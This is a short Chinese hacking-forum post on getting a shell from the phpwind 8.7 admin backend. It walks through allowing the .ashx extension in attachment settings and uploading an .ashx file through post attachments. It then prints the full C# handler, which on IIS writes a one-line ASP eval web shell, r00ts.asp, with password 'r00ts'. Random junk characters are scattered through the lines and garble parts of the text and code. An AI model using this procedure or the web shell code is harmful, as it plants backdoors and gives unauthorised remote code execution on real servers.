phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
% ^) L$ Y# ]" g. k9 Q4 U! Y( M
. m# H0 _; \  V- V; `群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

! ]! u5 G# g9 l6 z然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
9 v8 k/ B4 I1 U( `0 x; M7 j6 [
2 p" G( b: r1 g0 i' ?% v& N, `打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
/ e- v. ?6 i0 X! [( o2 F  `7 p( W8 Uusing System.IO;
public class Handler : IHttpHandler {
9 R9 V3 t8 W. }+ b" B4 y3 L) i, ]% v: Vpublic void ProcessRequest (HttpContext context) {
6 M+ N6 ^# Z; _  P% y' zcontext.Response.ContentType = "text/plain";
2 N) |) |1 s5 x- J! P" L4 ^- XStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
! t. z' c% T. D8 A3 k) Jfile1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
9 Z0 i4 `0 q7 U4 M. j7 C9 Rfile1.Close();
" K$ f) v! V3 G}
& ?+ O+ B: t0 s8 @, h& W$ Zpublic bool IsReusable {
get {
return false;
  Y4 }7 D$ k1 L8 q$ E5 Z}
}
9 I0 ?) A! _( a1 F. l! \# ]}
0 y3 W* f' c" m: c